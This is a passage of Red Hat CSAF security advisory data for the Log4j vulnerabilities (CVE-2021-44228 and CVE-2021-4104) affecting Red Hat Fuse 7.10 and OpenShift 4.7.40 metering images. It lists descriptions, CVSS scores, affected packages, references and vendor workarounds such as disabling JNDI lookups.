"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jsoup: Crafted input may cause the jsoup HTML and XML parser to get stuck"
},
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
}
]
}
rhsa-2021_5107
Vulnerability from csaf_redhat
Published
2021-12-16 15:00
Modified
2024-12-12 01:18
Summary
Red Hat Security Advisory: OpenShift Container Platform 4.7.40 security update
Notes
Topic
Red Hat OpenShift Container Platform release 4.7.40 is now available with
updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat OpenShift Container Platform is Red Hat's cloud computing
Kubernetes application platform solution designed for on-premise or private
cloud deployments.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)
* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Container Platform release 4.7.40 is now available with\nupdates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5107",
"url": "https://access.redhat.com/errata/RHSA-2021:5107"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "2031667",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667"
},
{
"category": "external",
"summary": "2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5107.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Container Platform 4.7.40 security update",
"tracking": {
"current_release_date": "2024-12-12T01:18:03+00:00",
"generator": {
"date": "2024-12-12T01:18:03+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5107",
"initial_release_date": "2021-12-16T15:00:19+00:00",
"revision_history": [
{
"date": "2021-12-16T15:00:19+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-16T15:00:19+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:18:03+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.7",
"product": {
"name": "Red Hat OpenShift Container Platform 4.7",
"product_id": "8Base-RHOSE-4.7",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.7::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"product": {
"name": "openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"product_id": "openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hadoop\u0026tag=v4.7.0-202112150631.p0.g6046504.assembly.4.7.40"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"product": {
"name": "openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"product_id": "openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hive\u0026tag=v4.7.0-202112140553.p0.g091bb99.assembly.stream"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"product": {
"name": "openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"product_id": "openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator\u0026tag=v4.7.0-202112150631.p0.g3959be4.assembly.4.7.40"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"product": {
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"product_id": "openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator-bundle\u0026tag=v4.7.0.202112150631.p0.g3959be4.assembly.4.7.40-1"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64",
"product": {
"name": "openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64",
"product_id": "openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-presto\u0026tag=v4.7.0-202112150631.p0.gd502108.assembly.4.7.40"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64 as a component of Red Hat OpenShift Container Platform 4.7",
"product_id": "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64"
},
"product_reference": "openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64 as a component of Red Hat OpenShift Container Platform 4.7",
"product_id": "8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64"
},
"product_reference": "openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64 as a component of Red Hat OpenShift Container Platform 4.7",
"product_id": "8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64"
},
"product_reference": "openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64 as a component of Red Hat OpenShift Container Platform 4.7",
"product_id": "8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64"
},
"product_reference": "openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64 as a component of Red Hat OpenShift Container Platform 4.7",
"product_id": "8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
},
"product_reference": "openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-4104",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-13T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2031667"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Java logging library Apache Log4j in version 1.x. JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker\u0027s JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Based on the conditions to be exploitable (see details below), the risk is much lower than Log4j 2.x and Red Hat has assessed this to be Moderate severity. This flaw has been filed for Log4j 1.x, and the corresponding flaw information for Log4j 2.x is available at: https://access.redhat.com/security/cve/CVE-2021-44228\n\nNote this flaw ONLY affects applications which are specifically configured to use JMSAppender, which is not the default, or when the attacker has write access to the Log4j configuration for adding JMSAppender to the attacker\u0027s JNDI LDAP endpoint. \n\nIf the Log4j configuration is set TopicBindingName or TopicConnectionFactoryBindingName configurations allowing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228 Log4j 2.x, Log4j 1.x is vulnerable. However, the attack vector is reduced as it depends on having write access, which is not a standard configuration rather than untrusted user input. These are sufficient factors beyond the attacker\u0027s control.\n\nThe tomcat package shipped with Red Hat Enterprise Linux does not include log4j but it does include a default configuration for log4j, log4j.properties, which could be used with tomcat if users choose to install and configure the library. The JMSAppender is not enabled by default, and the permissions of the file can only be modified as root.\n\nRed Hat Virtualization ships log4j12-1.2.17, but it is used and configured in a way which makes this flaw not possible to exploit. Therefore impact is rated Low.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-4104"
},
{
"category": "external",
"summary": "RHBZ#2031667",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-4104",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4104"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104"
},
{
"category": "external",
"summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126",
"url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126"
},
{
"category": "external",
"summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301",
"url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx",
"url": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/13/1",
"url": "https://www.openwall.com/lists/oss-security/2021/12/13/1"
}
],
"release_date": "2021-12-10T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-16T15:00:19+00:00",
"details": "For OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5107"
},
{
"category": "workaround",
"details": "These are the possible mitigations for this flaw for releases version 1.x:\n\n- Comment out or remove JMSAppender in the Log4j configuration if it is used\n- Remove the JMSAppender class from the classpath. For example:\n```\nzip -q -d log4j-*.jar org/apache/log4j/net/JMSAppender.class\n```\n- Restrict access for the OS user on the platform running the application to prevent modifying the Log4j configuration by the attacker.",
"product_ids": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender"
},
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red 